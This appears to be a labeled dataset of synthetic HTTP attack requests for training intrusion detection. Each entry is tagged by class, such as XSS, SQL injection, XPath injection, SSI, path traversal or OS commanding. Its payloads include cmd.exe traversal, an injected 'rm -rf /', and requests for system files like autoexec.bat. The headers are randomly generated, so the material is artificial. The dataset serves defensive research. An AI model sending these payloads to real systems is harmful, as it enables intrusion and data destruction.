~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47007
Start - Id: 49682
class: XPathInjection
GET /ax/wGJ5Sgroup byNVAV/tcrvhQiG/1a9O1gHK.apNack/htF1J/HsFvarjDc1/tilstwodAt.swf?ho5psoe32g=6qx&eseeH=rrTxkttii6tuRsjte&A.eBMws.i=od%27+++or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+++i+%2B++j+++%2B+++k++++%2B++++l++%2B+++1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++%27tEbJactd%27%3D++++%27++eoselv%27++++or&wnngl=a_q HTTP/1.1
Host: www.itcidoq.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: eoiIMm-Ran7Kme;q=0.0, amit-olarve, o6dsN-c, gdihor5-hs8tleee;q=0.1, h2nrib-XE;q=0.4
Cache-Control: no-store
Client-ip: 143.153.106.190
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="176"
Date: Fri, 16 Apr 10 17:58:14 UTC
ETag: "kEZV4g66j0qldaMaD"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Mon, 20 Oct 08 16:16:27 CET
If-Unmodified-Since: Sun, 31 Aug 08 17:19:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9036
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: /etDeoh/npuya.tar.gz
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: incnnm23e/9.9
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 8.3 134.199.183.150:152
Transfer-Encoding: deflate
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49682
Start - Id: 48171
class: XSS
GET /sl/xeeet.php3?qXtr-=3meOrrnTrliiode&mearatdhll1o=%3Cxml++id++++%3D%22+X++++%22%3E%3Ca+++%3E%3Cb+++%3E%26lt%3Bscript++++%3E%5Balert+%28%27e52cah%27%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb+%3E%3C%2Fa++++%3E%3C%2Fxml++%3E&umhnAnalyntqslT=3&stetossmk=scriptTall HTTP/1.0
Host: 194.222.212.0:80
Connection: keep-alive
Accept-Charset: iso-8859-15, iso-2022-kr;q=0.2, windows-874, isiri-3342, cp-932
Accept-Encoding: identity;q=0.9, compress;q=0.1
Cache-Control: no-cache
If-Match: "d3Wy4b_otuCiC@i3D"
If-None-Match: "tQwdLS8KhoKPvuwr"
Proxy-Authorization: Digest response="8D5D1021Cb0A70eb79876Ab3Cd8ba1ac"
Referer: http://elA8o.cz/astoqs/Djet/Eiue/frngm.sh
Trailer: Host
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 1.3; ot-il; rv:3.0.7) Gecko/32492030
UA-Disp: 5867,8253,8
Via: 5.3 158.45.170.247, FTP/9.1 www.iosM.tiff, FTP/5.1 55.139.8.17

null

End - Id: 48171
Start - Id: 36597
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.6hso.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.8, compress;q=0.0, identity
Accept-Language: chd-qltRe;q=0.6
Cache-Control: 7d='lvo'
Client-ip: 3.238.183.148
Cookie: eemAtqc=sJCn@5;R25r1Dboot.ini=caoftwa=arE1xei;weyawille=072383832;tou7snoGlyxma=6go;biframelinkga;baaauterra9e=fIClNmF4R;Dmwu9passwdk@1=t0ett
Cookie2: $Version="52"
Date: Thu, 02 Aug 07 11:02:36 CET
ETag: W/"2ugy4E-E4UwJTbxpi1"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 28 Sep 06 10:32:44 CET
If-Unmodified-Since: Mon, 06 Dec 04 10:06:08 CET
If-Match: "bDVgXfEk6H9pEAYU"
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 15 Jul 08 04:54:36 UTC
Max-Forwards: 365
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic OWlMdGVpaEk6OW44bndybnI=
Range: -23163,-7
Referer: /azntX/4nyoRa3/ahtirla/mseGl.mpeg
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (compatible; h3Wt; Linux i586; tahrSl; ezao)
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: uowA1/4.3 www.eAnw04.htm
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 749 www.Tr23iqts.html "ontttfrynef0akictteo" "Sun, 16 Nov 08 15:04:07 CET"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 85538465859468
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36597
Start - Id: 42663
class: SqlInjection
GET /oneanozdesttt5aej/ruoaxigzlsrt/cM@9G8dWUaUxYP0LxA0/6iNf/taIhYzth@cNb.js?SiOiUhs2drtT=G&esfjA=%27+++++UNION++++++ALL+++++++++SELECT++r0cewsc4++FROM+++8raeweuskh+WHERE+%27%27+++%3D++++%27&rr=et HTTP/1.1
Host: www.rmNneeta8w.biz:28
Connection: close
Accept: text/*;q=0.5, application/rtf, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: ycY='cehdis'
Date: Sun, 15 Oct 06 03:46:56 GMT
ETag: W/"l.gpCOT9l_T0QwKSgq"
Expect: 100-continue
If-Modified-Since: Mon, 06 Jun 05 15:26:35 UTC
If-Unmodified-Since: Tue, 21 Sep 04 15:36:48 CET
If-Match: *
If-None-Match: "Wz6QvjY4qmlVN6EL_-"
Max-Forwards: 7
MIME-Version: 8.1
Pragma: i=i
Authorization: ntn5e seeo=nude
Referer: /remepjN/Hayen/tesn12/niwa.ace
TE: chunked;q=0.8,deflate;q=0.0
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 9.7; ai-se; rv:3.2.0) Gecko/87928755
Via: 9.8 2.190.10.226:9843, FTP/6.3 www.wixo.jpg:0
Transfer-Encoding: ceosom
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42663
Start - Id: 40722
class: SSI
GET /61stc/3Rlbtda/hhohhlmaaeonhselHCh/sZ8fAE/ttpX6pXNbTA/1Q3O8tDY0HspQYq/ic@GI4j8McEJb6/o3/qsoFooehtthz/rscondBgnEniE/tuEBk07ieam.aspx?nexnzus=qnsk&eyeIoa1tn=od-hwiPH&q0mn6bdpR93h=639644&Y59b=6saei&eENgt96aCet=%3C8%29ld&3services.A=0&mailzwCKdm=ishutdownexecBlphpe4Enet%26&xmltvar9imgo9=gexec%3Fsa7%7Ea&qL8RS=0&yBgA45v=t&4RIK8xMxw=eoe%3A&7hlseeeNera5=deleteeme+b4yt%28oCpms HTTP/1.0
Host: www.sdepDeHcph.fr
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.9
Accept-Encoding: <!--#odbc   connect="nAtn,aT,eni"  statement="select  *  from    i8i"-->
Accept-Language: Seex-mre
Cache-Control: max-age=7
Client-ip: 74.242.29.108
Date: Fri, 05 Dec 08 18:58:59 UTC
ETag: W/"aLQ6yLYTD6RR60Ku3"
If-Modified-Since: Mon, 05 Mar 07 22:07:18 GMT
If-Unmodified-Since: Fri, 08 Apr 05 05:10:09 GMT
If-Match: *
If-None-Match: "nQasknZ5bBq6mfJs"
If-Range: "fJN6aXEQP14UxL.M"
Max-Forwards: 763
Pragma: no-cache
Range: 4-17,17-65637
Referer: /gnQa/Dtsr/agsserme/oseeei/tt3Si.pl
TE: trailers,trailers,chunked
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 0.6; nt-ta; rv:5.3.4) Gecko/48489349
UA-CPU: Sparc
Via: HTTP/3.1 190.70.88.17, FTP/5.5 www.hjuna.png
X-Forwarded-For: 113.151.38.82

null

End - Id: 40722
Start - Id: 43362
class: OsCommanding
GET /ihsr8xtgel1asnicL/ceMzwehoitiohisntie/0G/hcsB1bit/oPfe19KIqf/eyjuJBDOXvAC/rllht/owppImIHANr6nOxuy40/d6f8uESdx.shtml?tzik=06&saeee=%60++rm+-rf+++%2F+++%60&1ro=rseikhU HTTP/1.1
Host: 133.204.16.79
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, identity, identity, compress, deflate
Accept-Language: ne-rej;q=0.7, ag-n0sg;q=0.6, e-dsee7Nbi
Cache-Control: max-stale
Client-ip: 156.10.128.233
Cookie: enka5yet0d=c6inxoajed<j-a;ATdeneoleti7azE=3s;RneyexHnIs= eh
Cookie2: $Version="744"
Date: Wed, 09 Apr 08 11:46:05 UTC
ETag: "Ek60HbXdSSvRl_Eny"
Expect: 100-continue
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Thu, 22 Dec 05 03:17:51 UTC
If-Match: "9AhCI5mLz0PxiszuM"
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 57
MIME-Version: 3.7
Pragma: q=hoq
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: NTLM bmVldTdpU0NtZVVuRW10bzAxdnl1eVRld3RJd2hlMHVpbGFjdTNzb29xYXk=
Range: 9-
Referer: /lhdim1rc/hsasogan.swf
TE: trailers
Trailer: If-Range
User-Agent: du-ng_K@0 http://www.ldlGez.net
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 12428062280224524
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43362
Start - Id: 47166
class: XSS
GET /icztwuJI2hI/hh8lXR/cx/aQO-bJjf5zOMEtRa3reR/72dJKW/rIpetcpq1RcBJ5/ruGSEgM/sGbk6YGK0O/s0/tsnn/1qMaJQj9hhttps/4X_qW6z6Levx4Hj@tUH.php?0al=tEEgZ-&spL1=jEqM&ZsfVmand=neitb5tulsbeoe&jow6Gexeccmd3qxR=%3Cdiv+++++style+%3D+%22+width%3A++++expression%28%5Balert+%28%27oetcui%27%29%3B%5D%29%3B+++%22+++%3E HTTP/1.0
Host: 246.252.56.119
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=513
Client-ip: 46.131.2.199
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="4"
Date: Thu, 23 Apr 09 17:01:04 UTC
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: 100-continue
From: rRktr@tnrerr.uk
If-Modified-Since: Tue, 09 Oct 07 15:31:44 UTC
If-Unmodified-Since: Sat, 03 Mar 07 22:27:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2464
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: /nrioffzt/uywhhl.asmx
TE: gzip;q=0.3,trailers
Trailer: If-Match
User-Agent: Mozilla/5.0 (compatible; thentaetai; Win 9x; 8rot7; enI9yl)
UA-CPU: MIPS
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 218.81.85.0
X-Serial-Number: 533969856895
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47166
Start - Id: 47325
class: XSS
GET /lteher.js?ooz8nft=mme9tiCo&l6systemMz=hbyrbiohniMRtIEl&aymarsbWsg0=53139&le0EhoLednoIci=oviieree8Oalrxa&tehcUniic=imgr3union9htall5mdsv7%40z%25a&bmn6mt=7&ttraet=60227&oimpdeohter=iC8Y9YhE&leo=%3Ca+++++href%3D%22++++about%3A%3Cs%26%2399%3Bript++++%3E%5Balert%28%27ieroM%27%29%3B%5D%3C%2Fscript+%3E%22+%3E&Ie7hpqus=op02vsIJESS&mltwh=wl9- HTTP/1.1
Host: 52.95.147.220:68602
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-tw, windows-1252, x-mac-chinesetrad, iso-2022-jp, cp-932;q=0.3
Accept-Encoding: gzip, compress;q=0.7, compress, compress;q=0.8, compress;q=0.4
Accept-Language: pya-gmFpu, ope-3nNo, bha-zooca, gsreCe5t-x
Cache-Control: no-transform
Client-ip: 68.164.101.129
Cookie: aai=558755;sdtieerm0tzhofe=tryhomes;eeohthckoWase=? h5;tygk8=neosaOiGnenehqn;irS=4;0wthoaeiln=pauvsddo
Cookie2: $Version="4"
Date: Tue, 30 Oct 07 16:41:16 CET
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: ueasrS@d1jogree.it
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 3.5
Pragma: nepl='dNa'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic ZXNwZXRmOnNldGUxb2Jv
Range: -827060,69-,229-399617
Referer: http://www.hoeowte.de/5Qiv7/nsoadm/lu3dtaet/6t1ao/pisunfo.conf
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: qgkrh/4.2.7.8.0
UA-CPU: 68000
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 932x777
Via: FTP/0.4 243.52.213.208, ewo/8.5 www.aosetyt.html
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47325
Start - Id: 47759
class: XSS
GET /4nDtsestere/zTP-documentKwinntJs4mailoMWJ/Issicsmgtm/tOetFe/QHup.jpeg?7u=%26%7B%5Balert+%28%27al0e9iEc%27%29%3B%5D%7D%3B HTTP/1.1
Host: www.iiexgmrlA6.be
Connection: close
Accept: audio/*;q=0.3, application/x-tar, audio/*
Accept-Charset: x-mac-arabic, windows-1254;q=0.1
Accept-Encoding: 
Accept-Language: p-oM;q=0.6, cnugmp8X-esE5e9l
Cache-Control: no-cache
Client-ip: 87.178.32.94
Cookie: V@3WhpRNnodey5=os b0h6ae;qhc=tn;M9telnettelnet79Ex=a9u;dJe7g4om07np=6234651885
Cookie2: $Version="9"
Date: Wed, 06 Jun 07 22:32:42 CET
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Mon, 20 Oct 08 20:15:49 GMT
If-Match: "OqfaOdc4bJRDHS_xZ"
If-None-Match: "OyVqSAR8XdFF-K@N"
If-Range: Wed, 05 Apr 06 13:04:38 UTC
Max-Forwards: 18
MIME-Version: 7.7
Pragma: eath='ohntO'
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic VGE0aXJhOmFoaDFoZQ==
Range: -41921,082-
Referer: /abea/Iktnent/D2esNc2t/stli9esy/4n7aOd.exe
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 4.0; Bj-02; rv:8.7.4) Gecko/93551839
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 5.5 www.nrin4a.html:7, 5.1 55.47.106.171, 1.8 116.24.12.146
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47759
Start - Id: 36120
class: PathTransversal
GET /ieiu/ttfldil/eg4BxBrM-EtHLepvs/03ETr6RhlYBLJhJxyBb/io8jtlR/Hs6Te6.js?t1cI=%40h%3Bas&en7w=nsNAs%24%25%5B&nl1iA=32048&9iEmre4eSd=lta%3EltimgscriptlArY%3Ak%3Fy%5B+u&F5L9BNyNRY3=926038&dc5sdetildrE8l=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&1Q1p=myahhlNSE+a+m+ohaving&0ffce=23&agtbnotvqga0r5=irtrOid&PaMtSinputQ=cier&zeoGh4u3as=64369&ndooortmlSmu=49417792&es3wj=edtrpzaaeez HTTP/1.1
Host: www.4i6lRtel.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6, identity;q=0.1
Accept-Language: tft-NmiEh;q=0.0
Cache-Control: max-age=958
Client-ip: 180.199.9.54
Cookie: fhnemnblAn=T+ logskrt;asaaiIeaer=6n;gnodezII=t
Cookie2: $Version="406"
Date: Mon, 20 Feb 06 10:01:59 UTC
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: *
If-None-Match: "0DaHq-f_qTdCAPg"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.2
Pragma: t=c
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 19-,956383-413
Referer: http://www.0ieoi.fr/tIfea/eob1hi/pnss7nnU/legap.cfm
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/5.5 (X11; U; Solaris 2.3; n7-qs; rv:2.0.9) Gecko/39500619
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: HTTP/1.8 56.238.245.54:1
Transfer-Encoding: gzip
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36120
Start - Id: 43834
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 224.138.85.152:63
Connection: close
Accept: */*;q=0.2
Accept-Charset: big5
Accept-Encoding: gzip, gzip
Accept-Language: *
Cache-Control: max-age=02
Client-ip: 172.122.152.72
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Sat, 25 Oct 08 12:31:48 GMT
ETag: "zQHzJlf7BIhHrxg"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: *
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 40
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM d3JhcnppaGF6bWlFYm5pUG9zZHQ0bGRFczBlc2g5b2NldW8w
Range: 653-,494-99921,2-094773
Referer: /lfiarc/arsoes/asgflase/yhpn.swf
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (X11; U; Unix 5.2; ne-we; rv:6.5.0) Gecko/81447955
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: FTP/9.1 237.25.183.253:05820
Transfer-Encoding: eoshG
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43834
Start - Id: 40489
class: SSI
GET /ro/duzrenEamclnef8/eOp.QCDr83j/r9LzLQB-Ldy0cfPn37i/drmaooRTirelr4e/e.eqnK@UieSoKx7kdO6.exe?si7tttlie=z%3Aeon%26rlrhta&jdepaydohas=rp&haobiYsioeo=4Fn&eHemEkhm0j1et5=7&6eLothdti=%3C%21--+%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&muf@update7=ycooecenaiismu&urmcae7yoll=NeE&i6o2te=rmwTle9sEnreceni&dwe=iie7&fhdethtx8stTl=%40wh&leet1rueDens=38199&hee6=49 HTTP/1.0
Host: 206.5.119.67
Connection: ogrcg
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: e-aelu;q=0.4, fAme4fc-zihH;q=0.7
Cache-Control: min-fresh=70
Client-ip: 213.246.4.171
Cookie: wHh=fepotAt3;zVAM=waldst;ttn5lr8sIae8d=33)nsescript
Cookie2: $Version="027"
Date: Wed, 10 Dec 08 13:55:46 UTC
ETag: W/"lV.GdboxeN19M4h0eQU"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Thu, 27 Oct 05 04:28:34 CET
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "9UuyQOu4-ojSsHh02mI7"
If-None-Match: *
If-Range: Fri, 20 Jan 06 16:37:37 UTC
Max-Forwards: 59
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: dieeti mdri=t5rlnOn
Range: 120-,-29
Referer: /eear.sh
TE: deflate,chunked;q=0.8,trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (compatible; MSIE 4.6; Solaris; s7ee; oebniirhee)
UA-CPU: StrongARM
UA-Disp: 609,4490,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: 2.3 208.108.86.29, HTTP/3.0 114.118.211.239
Transfer-Encoding: deflate
Upgrade: ts54/2.4, d9bEte/1.6, rdsh/2.9
Warning: 801 69.96.230.25 "gie9i8edctt4ENs" "Tue, 27 Jan 04 19:25:43 UTC"
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40489
Start - Id: 49243
class: XPathInjection
GET /tehjiehfbmiaogEodp3/oUt@9ImzlbY5Fi33Yr./k1c_/RbdTdwMnfoio3uc/systemWrp8/mRPkA647VDio8v9/2bG53izEe/tOyirutavd6hitgetRa.mspx?peetqNei0ti=3567&yuwgwiBel=cfmeau%2Fatend%2Fe1ei%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D835%5D++%7C+c%2Fnda%2FejnEf%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++++or+++%27ce%27++++%3D++++%27&oir9eiea4mig=5Zqr&qdeEaLnv2ns=w HTTP/1.1
Host: www.eRrl.be:1608
Connection: ttat8Mo
Accept: audio/basic;q=0.0, text/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 200.206.243.113
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Sun, 29 Feb 04 18:44:22 GMT
ETag: "k0tNy17@VGo1UDQzY0"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Sat, 07 Jan 06 05:13:57 GMT
If-Unmodified-Since: Thu, 02 Dec 04 01:58:00 GMT
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Fri, 18 Nov 05 21:03:53 GMT
Max-Forwards: 5
MIME-Version: 9.4
Pragma: 97s='aj'
Proxy-Authorization: Digest realm
Authorization: NTLM Y2lpbmNhb2RyazRsbnM4d2FUbm5uZXVlejVpdDJpcnJ2RW1h
Range: -364650
Referer: /phbOcu/aTeagra/nPgu.mp3
TE: trailers
Trailer: TE
User-Agent: skXFxI http://www.stinted.com
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 4.5 8.224.35.56, 0.5 www.f4Aa.css
Transfer-Encoding: compress
Upgrade: ja8xa/5.6
Warning: 066 www.lqoEr.jpg "ls5eia" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49243
Start - Id: 36068
class: PathTransversal
GET /cnnjnfleIn/Tje4ldheonnneito/tZLJJFxG/eoSZ@TPC7OCVnYXx.bLE/eXQYj/emhsenenrsEdarecesee/tdclIaiatcsh/sC/1sf-GsLiMXYNWY8Wdwd@.bin?vudigOnpen=sLZUYebOX&bt=tnzFn&YFI3N2i1@cat=257748594&7ieRtan2=1630&ostdin7YMLC=%24ty%25u%40h&G9Xupdatezl=pss&putch27oI=hZRPq.yrhC%40Y&lieyEPi=0&icta=thnetdscs3t&guaohett0WaEo=7071066&RoBpm=8434&rBirahofuryuCs=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&otosa=smahr HTTP/1.0
Host: 75.44.27.52
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.2, euc-jp
Accept-Encoding: *
Accept-Language: eda-yhoh;q=0.1, TmUq-Te, 3xvnb-i;q=0.7, b-sc, oe-ie11qTwi
Cache-Control: no-cache
Client-ip: 75.78.7.59
Cookie: andX3E5Qu=tdot;nzmtmpf=547555686;aEfnEhn4=113;eeatal=mlyedshioHApt7regi
Cookie2: $Version="080"
Date: Wed, 16 Mar 05 24:12:58 CET
ETag: W/"dZuaY1CGoQhnuPmf"
Expect: 7caedD
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 05 May 09 18:35:12 GMT
If-Unmodified-Since: Mon, 25 Aug 08 11:40:42 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Jan 04 05:44:52 UTC
Max-Forwards: 0489
MIME-Version: 1.3
Pragma: VHK=soA
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: hitiey Ai5g4Eh9=tsvbr
Range: -31,-3,49859-
Referer: http://www.jnv82.net/eiif/etste/monrDa/53ea/eediA.gif
TE: deflate
Trailer: Warning
User-Agent: Mozilla/3.2 (compatible; Konqueror/3.1; Win98; SOea1r; osen4i; roIba)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: FTP/9.6 164.60.22.111:0, HTTP/8.3 150.2.224.144, 7.8 www.naxNc.htm:8073
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36068
Start - Id: 44115
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ERaca.de:80
Connection: close
Accept: application/zip;q=0.3, audio/*;q=0.3
